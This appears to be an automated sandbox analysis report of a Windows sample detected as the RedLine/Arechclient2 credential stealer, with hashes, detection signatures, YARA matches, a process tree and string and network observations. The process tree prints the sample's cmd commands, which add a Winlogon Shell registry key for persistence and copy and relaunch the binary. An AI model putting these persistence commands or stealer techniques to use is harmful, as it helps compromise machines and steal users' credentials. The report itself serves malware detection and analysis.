Windows Analysis Report
atpRyiZGTE.exe

Overview

General Information

Sample Name: atpRyiZGTE.exe
Analysis ID: 652396
MD5: 0515b4d32d6d65d19832858957f0847f
SHA1: 3cb9acc775da6908c56890f0827398b817467e0e
SHA256: 9027302b65c696c2e079f70c18f55abc1fd10c497b4cad63bdbfbd8ac110b916
Tags: Arechclient2, exe

Detection

RedLine
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • atpRyiZGTE.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\atpRyiZGTE.exe" MD5: 0515B4D32D6D65D19832858957F0847F)
    • cmd.exe (PID: 6720 cmdline: cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6792 cmdline: ping 127.0.0.1 -n 38 MD5: 70C24A306F768936563ABDADB9CA9108)
      • reg.exe (PID: 3796 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe," MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • cmd.exe (PID: 6248 cmdline: cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6200 cmdline: ping 127.0.0.1 -n 45 MD5: 70C24A306F768936563ABDADB9CA9108)
      • PING.EXE (PID: 6864 cmdline: ping 127.0.0.1 -n 45 MD5: 70C24A306F768936563ABDADB9CA9108)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: atpRyiZGTE.exe PID: 3452 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(1 further entry not shown)
Source | Rule | Description | Author | Strings
0.2.atpRyiZGTE.exe.49762aa.1.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x451b1:$s1: +773yll
  • 0x45342:$s1: \xED\xF1\xF1\xF5\xBF\xAA\xAA
  • 0x475df:$s1: \xE5\xF9\xF9\xFD\xB7\xA2\xA2
  • 0x47783:$s1: PLLH\x02\x17\x17
  • 0x48628:$s1: \x13\x0F\x0F\x0BATT
  • 0x82d05:$s1: \xCA\xD6\xD6\xD2\x98\x8D\x8D
  • 0x451be:$s2: +7730yll
  • 0x4534f:$s2: \xED\xF1\xF1\xF5\xF6\xBF\xAA\xAA
  • 0x475ec:$s2: \xE5\xF9\xF9\xFD\xFE\xB7\xA2\xA2
  • 0x47790:$s2: PLLHK\x02\x17\x17
  • 0x4c19a:$s2: \xF5\xE9\xE9\xED\xEE\xA7\xB2\xB2
  • 0x4c5f7:$s2: \x08\x14\x14\x10\x13ZOO
  • 0x73a84:$s2: osswt=((
  • 0x73b9b:$s2: \xCB\xD7\xD7\xD3\xD0\x99\x8C\x8C
  • 0x83582:$s2: \x0E\x12\x12\x16\x15\II
0.2.atpRyiZGTE.exe.49762aa.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.2.atpRyiZGTE.exe.49762aa.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.atpRyiZGTE.exe.49762aa.1.unpack | MALWARE_Win_Arechclient2 | Detects Arechclient2 RAT | ditekSHen
  • 0x92f6d:$s14: keybd_event
  • 0x97c10:$v1_1: grabber@
  • 0x90796:$v1_2: <BrowserProfile>k__
  • 0x9185a:$v1_3: <SystemHardwares>k__
  • 0x91919:$v1_5: <ScannedWallets>k__
  • 0x919a9:$v1_6: <DicrFiles>k__
  • 0x91985:$v1_7: <MessageClientFiles>k__
  • 0x91d4f:$v1_8: <ScanBrowsers>k__BackingField
  • 0x91da1:$v1_8: <ScanWallets>k__BackingField
  • 0x91dbe:$v1_8: <ScanScreen>k__BackingField
  • 0x91df8:$v1_8: <ScanVPN>k__BackingField
  • 0x84e76:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
  • 0x84682:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x451b1:$s1: +773yll
  • 0x45342:$s1: \xED\xF1\xF1\xF5\xBF\xAA\xAA
  • 0x475df:$s1: \xE5\xF9\xF9\xFD\xB7\xA2\xA2
  • 0x47783:$s1: PLLH\x02\x17\x17
  • 0x48628:$s1: \x13\x0F\x0F\x0BATT
  • 0x82d05:$s1: \xCA\xD6\xD6\xD2\x98\x8D\x8D
  • 0x451be:$s2: +7730yll
  • 0x4534f:$s2: \xED\xF1\xF1\xF5\xF6\xBF\xAA\xAA
  • 0x475ec:$s2: \xE5\xF9\xF9\xFD\xFE\xB7\xA2\xA2
  • 0x47790:$s2: PLLHK\x02\x17\x17
  • 0x4c19a:$s2: \xF5\xE9\xE9\xED\xEE\xA7\xB2\xB2
  • 0x4c5f7:$s2: \x08\x14\x14\x10\x13ZOO
  • 0x73a84:$s2: osswt=((
  • 0x73b9b:$s2: \xCB\xD7\xD7\xD3\xD0\x99\x8C\x8C
  • 0x83582:$s2: \x0E\x12\x12\x16\x15\II
(35 further entries not shown)
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: atpRyiZGTE.exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\LightKeeperService.exe | ReversingLabs: Detection: 42%
Source: atpRyiZGTE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\LightKeeperService.exe | Joe Sandbox ML: detected
Source: atpRyiZGTE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.185.100:443 -> 192.168.2.4:49746 version: TLS 1.0
Source: atpRyiZGTE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: www.google.com; Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 142.250.185.100:443 -> 192.168.2.4:49746 version: TLS 1.0
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: atpRyiZGTE.exe | String found in binary or memory: http://api.textlocal.in/send/?
Source: atpRyiZGTE.exe, LightKeeperService.exe.19.dr | String found in binary or memory: http://api.textlocal.in/send/?1sangleshubham9
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ns.adp/1.0/
Source: atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ns.microsoto/1.2
Source: atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295467627.0000000006850000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295597676.0000000006845000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295438765.0000000006845000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: atpRyiZGTE.exe, 00000000.00000003.295735340.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295655832.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295687027.0000000006846000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/i
Source: atpRyiZGTE.exe, 00000000.00000003.299802336.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.299334032.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300440687.0000000006859000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlG
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: atpRyiZGTE.exe, 00000000.00000003.314251572.0000000006846000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312675141.0000000006814000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: atpRyiZGTE.exe, 00000000.00000003.312783150.0000000006855000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312649918.0000000006855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html8
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: atpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: atpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: atpRyiZGTE.exe, 00000000.00000003.299475642.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300737819.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300455988.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300935758.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300039387.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.301161307.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300667068.0000000006814000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.comr
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: atpRyiZGTE.exe, 00000000.00000003.309958195.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309784943.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310013124.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310158459.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309902011.0000000006814000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.de
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deEv
Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: atpRyiZGTE.exe, atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: atpRyiZGTE.exe, LightKeeperService.exe.19.dr | String found in binary or memory: https://www.google.com%BorderColorFocused
Source: atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
Source: atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.comT
Source: unknown | DNS traffic detected: queries for: www.google.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: www.google.com; Connection: Keep-Alive

System Summary

Source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: atpRyiZGTE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Code function: 0_2_00991328
Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Code function: 0_2_00FE7408
Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Code function: 0_2_00FE7B51
